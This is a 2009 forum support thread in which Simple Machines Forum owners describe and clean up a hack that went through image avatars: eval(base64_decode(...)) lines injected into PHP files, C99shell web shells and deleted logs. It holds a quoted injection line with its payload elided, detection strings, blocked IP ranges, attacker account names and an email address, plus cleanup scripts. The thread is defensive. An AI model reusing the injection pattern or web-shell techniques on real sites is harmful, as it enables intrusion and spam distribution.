I visit my admin page almost every day so some warning could have prevented me being hacked the way it happened now.
Title: Re: Hacked, script injection
Post by: WillyP on May 16, 2009, 09:51:37 AM

My forum showed no signs of the affliction... a wiki installation on the same domain errored out, that's how I knew there was a problem.

What do you mean by that ? He registered on my forum too with both of his nicknames. He only activated one of his accounts and uploaded the fake avatar containing that php code but I can't find anything wrong or weird in any other files (it's 4 a.m. here and I'm still searching). He was active for only 1 minute and 9 seconds.

Wouldn't it be safer for everyone if this topic would be in a member only board ? (I guess not ...just asking)

Meaning, the forum functioned fine, although I did not test every single item, it appeared to be working normally. This particular website also has an installation of WikkaWiki, which did not work. When I went to the wiki, instead of the wiki page, there was an error message. He did not register on the wiki, only on the SMF forum. However EVERY php file I looked at on the domain was infected with the "Eval (etc...)" code. EXCEPT the config files, which were set read only. I also had a few files infected that were unrelated to either the forum or the wiki. Uploading the avatar is only the first step in his evil plot ;), the code must then be activated. So step two is infecting the php files, which seemed to be done days later. Someone reported a large number of files uploaded to the server, apparently step three. I did not get these, I discovered the infection about nine hours after it occurred. Who knows what step four would be? World domination? ;)
Title: Re: Hacked, script injection
Post by: Sarge on May 16, 2009, 09:55:38 AM
Who knows what step four would be?

Spam. Apparently that's the whole purpose.
Title: Re: Hacked, script injection
Post by: rthrash on May 16, 2009, 11:06:37 AM
Once again, be aware that the SMF development team is working very hard on putting together an official security patch.

I'm surprised that this hasn't been broadcast through the admin panel "Live from Simple Machines..." feed yet. Most site owners probably don't check back to the Main SMF site daily and every day that goes by is another chance for more exploits and unhappy forum owners. Not talking about the danger is borderline irresponsible at best. Your forum owners should have been warned IMO the day it was reported and verified, along with a temporary work around (disabling avatars/attachments).

It's a very destructive exploit: every PHP file is compromised even outside of SMF, and in our case every file with "log" in it anywhere was deleted including those named login, logout, blog, logo, etc. Didn't matter the filetype (images, css, php and html files were affected—they were trying to hide their tracks). On less secured systems, it would be possible to install a rootkit and require wiping a server completely including OS reinstall to be sure things are safe again.
Title: Re: Hacked, script injection
Post by: Samker on May 16, 2009, 11:03:04 AM
thanks to our webhost (GC Solutions) for sending around an e-mail warning all the SMF users about this hacker.  We would not have know about this threat if it weren't for that e-mail. 

SimpleMachines should have warned everybody through our SMF Admin panel - I'm sure it would have prevented many of the hackings.

I agree that would be great help...

Don't know whether that is possible before releasing a new patched version??

 
Title: Re: Hacked, script injection
Post by: Filipina on May 16, 2009, 12:05:28 PM
I spent about 5 hours last night trying to contact SMF websites that showed the hacker user names on search. If they had any activity at all I signed up just to let them know. It seems unbelievable to me that after this much time has gone by there is no real official warning, patch, news flash, anything official from SMF.

Of course there are threads here with people discussing it, but unless you get the warning out to SMF's users most of them are flying blind. More and more sites are being severely compromised or even destroyed every day. If SMF can send me a news flash in my package manager every time a new MOD comes available, then I don't understand why at least a warning cannot go out?
Title: Re: Hacked, script injection
Post by: zaphodb777 on May 16, 2009, 12:36:45 PM
Okay, I am desperately looking for a sample of the URL used to execute this attack, and what, if anything is abnormal to SMF about it.

Why? So i can add a signature to ZB Block (http://www.spambotsecurity.com/zbblock.php) to stop it cold. I at least want to protect against everything that needs to be done after they upload the malevolent avatar.

From what I gather, it requires a null truncation (%00) on the filename given to "pop" the .gif/.jpg/.png extension off the top and leave the upload as a .php ? (If so ZB Block already knows this attack).

Since I am not a user of SMF myself, I could use any input regarding the adding of signatures to ZB Block that would help wrap SMF in a layer of protection.

Zap :)
Title: Re: Hacked, script injection
Post by: respar on May 16, 2009, 01:16:49 PM
My site got hacked by krisbarteo too.  He or it registered an account probably about a week ago.  Yesterday I changed my theme to a dark background and noticed his avatar was just a white box, and thought that was weird.  Then my avatar disappeared and some attachments weren't showing up.  I checked my source code, and saw a bunch of spam after the <body> tag and knew I had been hacked.  I had to go through all my php files and delete the base64 code at the top.

I'm wondering if this is just a bot, because my site is fairly new and doesn't have an active base, so I'm not sure why "krisbarteo" would waste his time on my site.  As far as attachments, can't we just check the box that checks the file extension against .php?  I just limit attachments with users with 25 posts or more, but I disabled avatars for now.
Title: Re: Hacked, script injection
Post by: rthrash on May 16, 2009, 02:07:40 PM
He takes the time because your site now provides a convenient source for installing other malware for anyone that visits with the right browser/OS/click combination.
Title: Re: Hacked, script injection
Post by: metallica48423 on May 16, 2009, 02:35:34 PM
Quote
SimpleMachines should have warned everybody through our SMF Admin panel - I'm sure it would have prevented many of the hackings.

We hope to release a patch in the next few days, but we've found some serious bugs as a result of the changes.

In the interim, I believe disabling attachments and user-uploaded avatars should prevent the injection from being uploaded.

We are already working on a patch for this which will be released once between the developers, the team, and the beta testers, we've worked all the bugs out.  If we released it right now, your attachment and avatar systems would not work.

I'd like to note that this is *not* just a patch to close a small hole, this is a patch to prevent this type of attack from being possible again.  This patch will beef up attachment and avatar security significantly.  Though it is technically a new security enhancement "feature", the patch will still cover 1.0, 1.1, and 2.0 despite all three being feature locked.

The reason for this change is twofold:
1.) The pattern of the last SMF exploits has been alterations of prior exploits pertaining to poisoned attachments and avatars.  Rather than close one small hole, we are opting to close the possibility of this type of attack coming up again.
2.) IE6 will pretty much run just about anything injected into an image blindly without thinking twice about it.  This could infect your computer (as others alluded to above).

If you've already experienced the hack, I recommend virus scanning your computer as well.

Again, I'd suggest disabling your attachment and avatar uploads temporarily until the patch is out.  Everyone should also make sure there are no rows for themes in the themes table that should not exist.
Title: Re: Hacked, script injection
Post by: Sarge on May 16, 2009, 02:43:23 PM
I also recommend disallowing members to select themes. This can be done at Admin > Themes and Layout.
Title: Re: Hacked, script injection
Post by: Filipina on May 16, 2009, 02:48:03 PM
Thank you. Does it make any difference if we are one of those that changed the upload path for user-uploaded avatars out of the attachments folder? Just curious if this will make any difference on applying the patch or how useful it will be. Thanks.
Title: Re: Hacked, script injection
Post by: Broken Arrow on May 16, 2009, 02:56:05 PM
My entire forum is gone. That hacker got into my forum and just as I was deleting him, the forum disappeared

http://www.brokenarrowspeacepipe.com/forum2/

I have tried to restore the back up file through the cpanel  but I still cannot get the forum to come online


Is my only option to rebuild from scratch?
Title: Re: Hacked, script injection
Post by: metallica48423 on May 16, 2009, 03:00:55 PM
You could download the "large upgrade" package from our downloads page and use that to completely refresh and overwrite (thus sanitizing) all of your forum's files.  Just make sure to delete all the files starting with "upgrade".

However, any custom mod files and such -- php files that aren't part of the default distribution -- will need to be sanitized by hand.

Any such mods would also need to be reinstalled
Title: Re: Hacked, script injection
Post by: Broken Arrow on May 16, 2009, 03:08:30 PM
thanks Metallica

That pretty much leaves me rebuilding it from scratch. I had a lot of modifications added to the theme files I had used. Not to mention the mods added

geez, what a nightmare
Title: Re: Hacked, script injection
Post by: Sarge on May 16, 2009, 03:11:09 PM
In general, after uploading the SMF upgrade package, you should verify every file that is not part of the SMF distribution; this includes verifying all avatars, attachments, custom theme files etc.
Title: Re: Hacked, script injection
Post by: Sarge on May 16, 2009, 03:12:54 PM
Can anybody confirm whether or not preventing users from choosing their own theme will stop this hack?

It's possible that disabling theme selection is enough, but I would disable all kinds of uploads as well, at least until the patch comes out.
Title: Re: Hacked, script injection
Post by: Tiribulus on May 16, 2009, 03:20:04 PM
<<< also make sure there are no rows for themes in the themes table that should not exist.

I don't mean to sound dopey, but what SHOULD be there so I (we) know when something is out of place? Near as I can tell this @$$hat hasn't gotten into my site, but I'm not sure what rows are supposed to be there in the first place. To me it doesn't look like anything out of place is there, but you guys would know better than I would.
Title: Re: Hacked, script injection
Post by: Sarge on May 16, 2009, 03:23:56 PM
Sort by ID_THEME descending and look for ID_THEME = 32, as well as for any values (in the value column) that end with a \0 character (it usually looks like a black diamond with a question mark inside).
Title: Re: Hacked, script injection
Post by: zaphodb777 on May 16, 2009, 04:02:42 PM
One would have to wonder if just adding a delete command to the upload task, that would delete all *.php files in the upload directory would be good enough...

Or, perhaps upload to a directory other than the normal avatar directory, then have the whole of the directory copied into the accessible one, but only copying *.jpg, *.gif, and *.png files, and skipping pre-existing ones at the end of upload.

Good luck folks,
Zap
Title: Re: Hacked, script injection
Post by: Tiribulus on May 16, 2009, 04:03:10 PM
Sort by ID_THEME descending and look for ID_THEME = 32, as well as for any values (in the value column) that end with a \0 character (it usually looks like a black diamond with a question mark inside).

Mine looks clean. I've had it torqued down pretty good for quite a while, but I'm wondering if the fact that I never had user selectable themes enabled at all might be the clincher. Also have recaptcha, are you human, puzzle and clock mods along with stop spammer and Unrecognizable Form. Not to mention having the PHP engine disabled for avatar and attachment directories. Password protected docroot too. I also killed all the ip info that's come up with this guy on my router.
Title: Re: Hacked, script injection
Post by: Kindred on May 16, 2009, 04:16:50 PM
Zaphod,

The point is that we already sanitize uploads and do not allow php files.   What this hacker is doing is uploading a .jpg file that contains php code...
Title: Re: Hacked, script injection
Post by: zaphodb777 on May 16, 2009, 04:36:42 PM
K, I thought they were using a null truncator (%00) to slice off the .jpg (or whatever) when it hit the filesystem.

Nevermind. Still hoping there is a record somewhere of the URL they use to launch this, and if there's anything in it that is unique enough it can be added as a hostile action to my pre-parser script.

Thanks,
Zap.
Title: Re: Hacked, script injection
Post by: crash56 on May 16, 2009, 04:46:21 PM
We hope to release a patch in the next few days, but we've found some serious bugs as a result of the changes.

In the interim, I believe disabling attachments and user-uploaded avatars should prevent the injection from being uploaded.

We are already working on a patch for this which will be released once between the developers, the team, and the beta testers, we've worked all the bugs out.  If we released it right now, your attachment and avatar systems would not work.

I'd like to note that this is *not* just a patch to close a small hole, this is a patch to prevent this type of attack from being possible again.  This patch will beef up attachment and avatar security significantly.  Though it is technically a new security enhancement "feature", the patch will still cover 1.0, 1.1, and 2.0 despite all three being feature locked.

I can't begin to imagine how much work this entails ... especially the 'debugging' process.  I know from working with some other automation that spotting, chasing down, and remedying the bugs can be both infuriating and the most time consuming portion of the process.  I appreciate all the effort that goes into coming up with a reliable, stable patch. 

As someone said earlier (I think it was JBlaze), I've got the three forums I run locked up tighter than a crab's ass.  Pre-banning KrisBarteo and his IP has gone a long way in terms of defenses.  As of this evening, he has tried to register at all three forums now, and has been turned away.  I can wait quite patiently for the patch.  ;) 

Title: Re: Hacked, script injection
Post by: Broken Arrow on May 16, 2009, 07:39:25 PM
I managed to restore most of my database. I have discovered that the hacker used a 2nd name:  stilusmagic

I don't know if that has been shared with you already but it's the same IP as the other hacker name

Title: Re: Hacked, script injection
Post by: ConquerorOfMankind on May 16, 2009, 07:51:12 PM
So avatars linked from other image hosters are still safe? Did I understand that correctly?


And has anyone planned to do legal actions against that hacker, i.e. make a criminal complaint at the local police station?
Title: Re: Hacked, script injection
Post by: Sarge on May 16, 2009, 08:02:11 PM
So avatars linked from other image hosters are still safe? Did I understand that correctly?

Yes, but uncheck "Download avatar at given URL" in Admin > Attachments and Avatars > Avatar Settings tab.

From the help text: "With this option enabled, the URL given by the user is accessed to download the avatar at that location. On success, the avatar will be treated as uploadable avatar." So I don't recommend enabling it.
Title: Re: Hacked, script injection
Post by: ConquerorOfMankind on May 16, 2009, 08:34:49 PM
Ok thanks. I hope there will be an update soon.

And is SMF 2.x concerned by that? What I have read before seems only to be 1.1.8.
Title: Re: Hacked, script injection
Post by: JBlaze on May 16, 2009, 08:41:55 PM
Ok thanks. I hope there will be an update soon.

And is SMF 2.x concerned by that? What I have read before seems only to be 1.1.8.

It is also a problem in 2.0 but so far I have not seen an infected 2.0 version. (knock on wood)
Title: Re: Hacked, script injection
Post by: metallica48423 on May 17, 2009, 01:14:58 AM
All three branches of SMF are currently affected by this
Title: Re: Hacked, script injection
Post by: Samker on May 17, 2009, 03:25:20 AM
I managed to restore most of my database. I have discovered that the hacker used a 2nd name:  stilusmagic

I don't know if that has been shared with you already but it's the same IP as the other hacker name




I have them also (blocked) in a member base but with a different IP than krisbarteo, 78.157.140.2, and this mail address: stilusmagic@googlemail.com

Just some info, so you can check and block this IP ASAP.  ;)
Title: Re: Hacked, script injection
Post by: agridoc on May 17, 2009, 03:43:59 AM
Thank you for the reply.  :)

It seems that I have to remember my old days  ;D

I am looking for a cleaning script that would

- First ask for input of the string to search (the injected code).
- Search recursively the domain for the incidence of PHP files and build an array.
- Use this array to open and search each PHP file and, if found, delete the string (the injected code).

Such a cleaning script would be greatly appreciated, even by supporters.

Dunno if you found a script by now; I have done just that with a simple find/sed shell routine recently.

Code: [Select]
nohup find /tmp/web13 -name "*.php" -exec grep -q "aWYoZnVuY3Rpb25" {} \; -print -exec clear.sh {} \; | grep tmp &

clear.sh:

Code: [Select]
#!/bin/bash
# Usage: clear.sh /absolute/path/to/infected.php
# Mirror the file's directory under /tmp/backup so nothing is lost.
mkdir -p "/tmp/backup$(dirname "$1")"

# Write a copy with the first line (the injected eval(base64_decode(...)) line) removed.
sed -e '1d' "$1" > "/tmp/backup$1"

# Keep the infected original with a .hack suffix, then put the cleaned copy in place.
mv "$1" "$1.hack" 2>/dev/null

mv "/tmp/backup$1" "$1" 2>/dev/null

You could even do it with the "sed -i" command in one line; I had to copy/move all the files because I did it on a curlftpfs-mounted device.
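The same cleanup as an added Python example (not the poster's find/sed routine and not SMF project code). Unlike a blanket "delete line 1", it removes only the injected prologue, so a file whose real `<?php` opening tag shares the first line with the injection survives intact, and it keeps a backup of every file it rewrites. It assumes the prologue has the shape quoted later in this thread, `<?php /**/eval(base64_decode('...')); ?>`, that the base64 payload begins with the marker used in the grep above (`aWYoZnVuY3Rpb25`, which decodes to `if(function_exists`), and that the caller supplies the forum root, a backup directory and the marker.

```python
"""Recursive cleaner for the injected eval(base64_decode(...)) prologue.

Added example: walks a directory tree, finds .php files containing a marker
string, strips only the injected prologue and backs up each rewritten file.
"""
import os
import re
from typing import List, Tuple

# Prologue seen in this thread:  <?php /**/eval(base64_decode('....')); ?>
# Group 1 captures the base64 payload so it can be checked against the marker.
# The optional trailing newline is eaten only when the prologue sits on its own line.
INJECTED_RE = re.compile(
    r"<\?php\s*/\*\*/\s*eval\(\s*base64_decode\(\s*'([A-Za-z0-9+/=]+)'\s*\)\s*\)\s*;\s*\?>[ \t]*\r?\n?"
)


def find_infected(root: str, marker: str, suffix: str = ".php") -> List[str]:
    """List files under root (with the given suffix) whose bytes contain marker."""
    needle = marker.encode("ascii")
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(suffix):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                if needle in fh.read():
                    hits.append(path)
    return sorted(hits)


def strip_prologue(text: str, marker: str) -> Tuple[str, int]:
    """Remove every injected prologue whose payload starts with marker.

    Returns (cleaned_text, removals). Anything following the prologue on the
    same line is preserved; a prologue with a different payload is left alone
    for manual review rather than silently deleted.
    """
    removed = 0

    def repl(m) -> str:
        nonlocal removed
        if m.group(1).startswith(marker):
            removed += 1
            return ""
        return m.group(0)

    return INJECTED_RE.sub(repl, text), removed


def clean_tree(root: str, marker: str, backup_root: str) -> List[str]:
    """Clean every infected .php file under root.

    The original bytes are copied to backup_root (same relative layout) before
    the file is rewritten. Returns the paths that were rewritten.
    """
    cleaned = []
    for path in find_infected(root, marker):
        with open(path, "rb") as fh:
            raw = fh.read()
        # latin-1 round-trips every byte unchanged, so non-UTF-8 files are safe.
        text, removed = strip_prologue(raw.decode("latin-1"), marker)
        if not removed:
            continue
        backup = os.path.join(backup_root, os.path.relpath(path, root))
        os.makedirs(os.path.dirname(backup), exist_ok=True)
        with open(backup, "wb") as fh:
            fh.write(raw)
        with open(path, "wb") as fh:
            fh.write(text.encode("latin-1"))
        cleaned.append(path)
    return cleaned


if __name__ == "__main__":
    import sys
    # Usage: python clean_php.py /path/to/public_html /tmp/backup aWYoZnVuY3Rpb25
    print("\n".join(clean_tree(sys.argv[1], sys.argv[3], sys.argv[2])))
```

Run it against a copy first and diff the results; files whose prologue carries a different payload are reported by `find_infected` only if they also contain the marker, so a second pass with another marker (or a manual look at anything still matching `eval(base64_decode(`) is still worthwhile.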
Title: Re: Hacked, script injection
Post by: (.:Al-Pacino:.) on May 17, 2009, 05:07:03 AM
When you type the word "krisbarteo" into Google,

you will get more than 20 SMF forum sites!!
Title: Re: Hacked, script injection
Post by: Samker on May 17, 2009, 05:55:13 AM
When you type the word "krisbarteo" into Google,

you will get more than 20 SMF forum sites!!



I found exactly 670 indexed entries; if we add some percentage of non-indexed forums, it's obvious that this exploit gets worse with every new minute.


Title: Re: Hacked, script injection
Post by: (.:Al-Pacino:.) on May 17, 2009, 07:15:01 AM
I hate this hacker  :-X

pls god protect all SMF Forums  O:)
Title: Re: Hacked, script injection
Post by: Dzonny on May 17, 2009, 08:06:38 AM
I hate this hacker  :-X

pls god protect all SMF Forums  O:)
Lol, God has nothing to do with that... :)
Title: Re: Hacked, script injection
Post by: rosey on May 17, 2009, 08:44:32 AM
ok so if my forum was hacked (thank god only ONE of my forums allowed uploadable avs!) and I installed a fresh install of SMF - is it safe now?  or do I have to still find that user and delete him?  and if so how do I figure out which user it is?

or can I just empty out the attachments directory and then their script won't run anymore?
Title: Re: Hacked, script injection
Post by: Dzonny on May 17, 2009, 08:46:02 AM
No, we are still waiting for the patch to be released...
Read this topic for info:
http://www.simplemachines.org/community/index.php?topic=309717.0
Title: Re: Hacked, script injection
Post by: thebofh on May 17, 2009, 10:46:32 AM
I just had krisbarteo register on one of my sites but his account was blocked by the spammers mod. I sent him an email stating that his actions weren't appreciated by the SMF community, although not as politely as that  8)
Title: Re: Hacked, script injection
Post by: Aleksi "Lex" Kilpinen on May 17, 2009, 10:49:46 AM
I just had krisbarteo register on one of my sites but his account was blocked by the spammers mod. I sent him an email stating that his actions weren't appreciated by the SMF community, although not as politely as that  8)
And now to wait for a reply :P
Title: Re: Hacked, script injection
Post by: thebofh on May 17, 2009, 10:54:52 AM
I just had krisbarteo register on one of my sites but his account was blocked by the spammers mod. I sent him an email stating that his actions weren't appreciated by the SMF community, although not as politely as that  8)
And now to wait for a reply :P
I doubt if he has enough time in the day to reply to all his abusive emails, or even a fraction of them, what a tosspot! I'm sure it's some teenage scumbag Eastern European script kiddie who doesn't even understand what's he's doing apart from following instructions from a real hacker.
Title: Re: Hacked, script injection
Post by: Aleksi "Lex" Kilpinen on May 17, 2009, 10:56:05 AM
I wasn't exactly serious there :P Didn't think he would respond...
Title: Re: Hacked, script injection
Post by: JoeB on May 17, 2009, 11:01:15 AM
My advice is to just:
IGNORE HIM
These kinds of internet abusers are the lowest of the low and motley attention seekers who enjoy any replies, however abusive they are.
Don't give them their treat & just ignore them
Title: Re: Hacked, script injection
Post by: MrPhil on May 17, 2009, 11:43:24 AM
Unfortunately, most hackers these days are apparently working (for pay) for spammers, rather than for the thrill and attention. They're cyberterrorists and it would be good to shoot the lot of them. It will eventually come to the point where the Internet has to be handed over to national Post Offices and postage be charged for every packet transmitted. Once it's no longer free, it will not be nearly so lucrative to spam. A side benefit will be that it will be cheaper to buy a legit CD or DVD than to download a pirated copy, thus greatly reducing piracy. The only losers will be hobbyists who download large software projects.
Title: Re: Hacked, script injection (Ranges to Block)
Post by: zaphodb777 on May 17, 2009, 12:21:48 PM
Your friend (dripping sarcasm on the word "friend") krisbarteo has been seen in these IP blocks.

77.92.88.0 - 77.92.89.255 ... LIMT Group, Suspected RBN
78.129.202.0 - 78.129.203.255 ... LIMT Group, Suspected RBN
78.157.140.0 - 78.157.143.255 ... Known RBN block

It is appearing that this is a major incursion by the RBN (Russian Business Network).

God be with us all against the red menace.

Zap :(

P.S. There are several more ranges the RBN squirts out of. Sorry about tooting my own horn here, but ZB Block (http://www.spambotsecurity.com/zbblock.php) does block most of them. You might try it out for the time being, as it's GPL freeware.
Title: Re: Hacked, script injection
Post by: ellion on May 17, 2009, 12:54:49 PM
what do i need to do check my database for this hack?
Title: Re: Hacked, script injection
Post by: ellion on May 17, 2009, 01:12:18 PM
when i cleaned up my SMF installation i compressed the corrupt public_html directory and downloaded it. i was just going through it now to see how much damage had been done but it does not look like the hack has gotten into too many files. however i tried to rename the folder and i am being denied access to it. is it possible that this contains some kind of virus that is run when the files are open on my own computer?
Title: Re: Hacked, script injection
Post by: robone on May 17, 2009, 03:09:58 PM
I had both krisbarteo and stilusmagic try and register early in may but my spam protection got them.

However, I did get caught with SanyaKill in March (before Spam protection) who uploaded an avatar that somehow had C99shell as part of it. He/she then got stuck in and had some fun by adding links to all my php files. I have resolved this by restricting the uploading of avatars or attachments until a member has posted a number of times.

As a rule, I have automatically banned anything with a .ru in it. Sorry Russia
Title: Re: Hacked, script injection
Post by: Broken Arrow on May 17, 2009, 03:47:55 PM
Can someone tell me which mod stops these things the best? I had tried the Stop Spam mod but it messed up the members list and did not show any of the images it was supposed to. I uninstalled it and the list returned to normal.

I wouldn't contact this spam guy in any way. I made the mistake of sending out a mass email to alert people to the missing avatar problem before I came here and saw what was causing the problem. I had another window open with my site up and saw that my mass email alerted him to come to my site. He showed up as a member online and then in a matter of minutes my site crashed completely...right before my eyes. I don't know what this guy did but files just disappeared off the server.

Title: Re: Hacked, script injection
Post by: robone on May 17, 2009, 03:57:11 PM
He probably used C99shell. Do yourself a favour and look it up on Google. Once they get it on your site, they can do things you would not believe. It was on my site as img.php in the attachments folder, and then once they were in they transferred it to my root directory. A friend had it on his site as dir.php. I was in such a hurry to delete it that I never checked the size, but looking it up elsewhere, it's about 47,029 bytes.

Worth checking every now and again. I have been looking for something that will scan and compare the files you should have on the server and what is there at present.
Title: Re: Hacked, script injection
Post by: Broken Arrow on May 17, 2009, 04:09:25 PM
I looked it up robone.

I am not experienced enough to understand all the talk about codes and scripts. I was reading this site: http://www.webhostingtalk.com/showthread.php?p=4703619 and it all just went over my head. I have taught myself as I go over the past few years. Protecting my site from this kind of attack is out of my league
Title: Re: Hacked, script injection
Post by: Zero_Panzer on May 17, 2009, 05:28:51 PM
I have this same problem. I removed and banned krisbarteo, now I'll have to re-upload new php-files.

DO NOT OVERWRITE Settings.php
:( I found the same code in my main index file. So I've got to go through all of them to see what's wrong? Dur. Oh well. Better to know what's wrong rather than to go in blindfolded.
I believe I actually did that first time around. What effect did it have on my forum?

Settings.php is what controls the connection between your forum and your database. It contains all the login info needed to connect.

To reset your Settings.php so it can connect back to your forum, use the repair_settings.php tool What is repair_settings.php? (http://docs.simplemachines.org/index.php?topic=663)
Title: Re: Hacked, script injection
Post by: Niklas_ on May 18, 2009, 08:29:28 AM
Does anybody know what the Hack does?

It does spread into all the *.php files available but that can't really be what krisbarteo is up to, can it?
Do I have to tell my members that I infected their computer?
Did he use my Forum to distribute SPAM ?
Or did he just use my Forum to store 230MB of stuff in my /Themes/default/languages Folder?

Thank you
Title: Re: Hacked, script injection
Post by: Aleksi "Lex" Kilpinen on May 18, 2009, 08:31:29 AM
The ultimate purpose seems to be linkspam... The hack adds loads of hidden links on your forum....
Title: Re: Hacked, script injection
Post by: JBlaze on May 18, 2009, 08:33:13 AM
So far, all we know as of now is that there is code injected into random, or seemingly random, php files. Also, there have been reports of some database tables getting injected as well.

I, personally, have not seen any spam or viruses etc. come from this attack, but that doesn't mean anything.

I'm sure there will be a detailed report on this once the security patch comes out, so keep your eyes peeled.
Title: Re: Hacked, script injection
Post by: rthrash on May 18, 2009, 09:07:37 AM
We had lots of files deleted, including those outside of the SMF install: anything with "log" contained in it including blog, login, logo, logout...
Title: Re: Hacked, script injection
Post by: Aleksi "Lex" Kilpinen on May 18, 2009, 09:08:17 AM
Sounds like a pretty smart hacker, trying to cover up after himself.... ::)
Title: Re: Hacked, script injection
Post by: cydewaze on May 18, 2009, 09:14:51 AM
Edit: Nevermind.  That line of code is definitely NOT supposed to be there.  Time for a reinstall :(
Title: Re: Hacked, script injection
Post by: Niklas_ on May 18, 2009, 09:22:03 AM
The ultimate purpose seems to be linkspam... The hack adds loads of hidden links on your forum....

OK, that's kind of a relief to me because it means that I can get rid of it without any persistent damage done to my board.

So far, all we know as of now is that there is code injected into random, or seemingly random, php files. Also, there have been reports of some database tables getting injected as well.
How do I know if my tables got injected? I have about 300k posts and 3k users; I can't check everything by myself...
Title: Re: Hacked, script injection
Post by: Zero_Panzer on May 18, 2009, 09:39:05 AM
I'd like to know too Niklas_ but I'm not sure what to tell you.
BUT!
It also can get to your root site
Say you have www.mysite.com/forums/
If you have any pages (HTML, PHP, etc) make sure you REMOVE THE CODE IN THERE!
If the bot got through to you then it also got to the main site. If not, CHECK TO BE SURE!!!
It got to mine. :( BUT! I have a backup of the mainsite :D
Title: Re: Hacked, script injection
Post by: Broken Arrow on May 18, 2009, 10:01:07 AM
lord, I just checked this morning and that code is on every single php file. I have subdreamer for the portal and several word press blogs and it's in all of them

I guess I have to go through each file manually and remove the code.

I did run a virus scan on my whole site and it said it showed no virus but I still don't trust this
Title: Re: Hacked, script injection
Post by: Zero_Panzer on May 18, 2009, 10:32:58 AM
lord, I just checked this morning and that code is on every single php file. I have subdreamer for the portal and several word press blogs and it's in all of them

I guess I have to go through each file manually and remove the code.

I did run a virus scan on my whole site and it said it showed no virus but I still don't trust this

Someone's using bots to bypass Simple Machines forums and using them and their root sites (www.blah.com, whatever is before /forum/) to create spam or do whatever they want. My site's email was accessed, and be sure to check for NEW files that were created.

I had one called "help.php" created, I know I didn't put it there and if I went to it it bypassed my FTP and had a single page view of everything that was on the site and basically was a .php version of an FTP page. The only way that I found works to delete it is to open the help.php and use it to remove itself.

Hope this more amount of information helps.

Also, I looked in my logs (for the emails sent out) and the email address that it used was: BlackC00de@hotmail.com
Title: Re: Hacked, script injection
Post by: Broken Arrow on May 18, 2009, 10:43:59 AM
I don't see a help.php file in my files. But I will go over it and be sure it isn't hidden in some folder I haven't looked in yet

I can't access the admin panel of my subdreamer section so I am reinstalling those files. I have one Word Press blog that seems to be messed up but the others look ok. For now


this is truly a mess. I'll be working on this all week I guess

My email seems to be clean..that's a good thing
Title: Re: Hacked, script injection
Post by: Niklas_ on May 18, 2009, 10:52:14 AM
OK, I did delete (nearly) all of the files on my webspace and uploaded a backup (except for .htaccess and Settings.php).

Next I created a new backup from my database and was pretty scared because it differed from an old backup by 20MB (about 1/4), so I compared the two backups, looking only at the differences, using the Linux command line tool diff:
Code: [Select]
diff -E -b -w -B -a --text --suppress-common-lines *old_backup*.sql *new_backup*.sql > diff.txt

In the end it turned out that most of the differences were error logs. I did not check every other entry, but for the smf_messages entries I did check I could not find anything that should not be there....

So now I am going to put my forum back online (disabling avatar upload for new members (members that are not in specific groups), disabling new attachments and not allowing members to choose a template other than my default template).
Title: Re: Hacked, script injection
Post by: Jorin on May 18, 2009, 12:01:33 PM
Is there any risk that modifications like the smf gallery can be unsafe to use in that way?
Title: Re: Hacked, script injection
Post by: jackulator on May 18, 2009, 01:17:04 PM
got me too - avatars missing, I look through php files and they all have the same line at the top now:

<?php /**/eval(base64_decode('................alphanumeric jibberish...............')); ?>

Title: Re: Hacked, script injection
Post by: jackulator on May 18, 2009, 01:39:09 PM
does everyone think this hacker went to a bunch of random SMF sites and did an sql-injection, or might it be possible that the section in admin that gives you updates from SMF was somehow hacked?

every php file on my site has that line in my previous post in it - not just the smf folder, so I don't know...
Title: Re: Hacked, script injection
Post by: Aleksi "Lex" Kilpinen on May 18, 2009, 01:40:43 PM
does everyone think this hacker went to a bunch of random SMF sites and did an sql-injection, or might it be possible that the section in admin that gives you updates from SMF was somehow hacked?
Neither - it has been established here, that this was done with a file upload...
Title: Re: Hacked, script injection
Post by: jackulator on May 18, 2009, 01:50:28 PM
here's the IP I had for the krisbarteo guy: 94.142.129.147

is this the same IP everyone else found? if he was dumb enough not to use a proxy I think a call to his ISP is in order - at the very least...
Title: Re: Hacked, script injection
Post by: Aleksi "Lex" Kilpinen on May 18, 2009, 01:53:18 PM
Looks familiar...
Title: Re: Hacked, script injection
Post by: robone on May 18, 2009, 02:07:10 PM
Mine had a link to "Luxorplay" posted in each php file. I checked most of the PHP files, and deleted the links, but I am still finding them in the help files.

From what I understand about C99Shell is that once they have access to your site, they can do a bulk add to all the php files. I had a look at the software, because a friend of mine managed to make a copy of it when he was infected, and it is powerful.

I don't think it was included with any upgrade. It gets in via uploaded avatars or attachments. And yes, again from what I understand, they try and see how many sites they can infect, so they identify all the smf sites and hack away.

I would look for the C99shell on your site, if you have been hacked, because if you have not found it, it is still there waiting for them to come back. As mentioned previously, I had 2 copies of it on mine. I was happy when I found the 1st one, and almost gave up looking, but then found the next one.
Title: Re: Hacked, script injection
Post by: MrPhil on May 18, 2009, 02:20:27 PM
I would look for the C99shell on your site, if you have been hacked

I have some custom scripts to scan my site for common hacks (base64, etc.). Is there any consistent pattern that I could look for to detect the C99shell?
Title: Re: Hacked, script injection
Post by: robone on May 18, 2009, 02:55:09 PM
I am looking for a script to do exactly that.

I have seen scripts (search google) that look for C99shell and some other names, but, they change the name, so you need a script that will open each php file and check the code.

See http://www.viruslist.com/en/viruses/encyclopedia?virusid=188613     

The file is 229051 bytes in size, so you need a script that will search all the files for a php that size


There is another site that may help. http://www.elitehackers.info/forums/showthread.php?t=17712

See post #4

I must admit, I actually do not understand what they are saying
Title: Re: Hacked, script injection
Post by: MrPhil on May 18, 2009, 04:53:31 PM
The file is 229051 bytes in size, so you need a script that will search all the files for a php that size

That wouldn't be hard to do (ls -alR | grep "229051"), but is it sufficient? Can this malware be trivially changed to be a slightly different size?

Quote
I must admit, I actually do not understand what they are saying

As best I can tell, PHP includes (and presumably requires) can be given a full URL rather than just a local file. In PHP 5 the inclusion of a URL is off by default, but it can be tricked into doing so? Anyway, it's not clear from the post whether this is something that C99shell does, or if it's something that is foisted on SMF's includes. Since SMF doesn't (AFAIK) include as names strings from user input, that shouldn't be a problem. I don't know if it uses a $_GET anywhere to bring in a file name (or URL) to be included -- I don't recall ever seeing such a thing. So, presumably, C99shell is doing this include or require to bring in a URL. Apparently, C99shell has to be "planted" in a separate operation first.
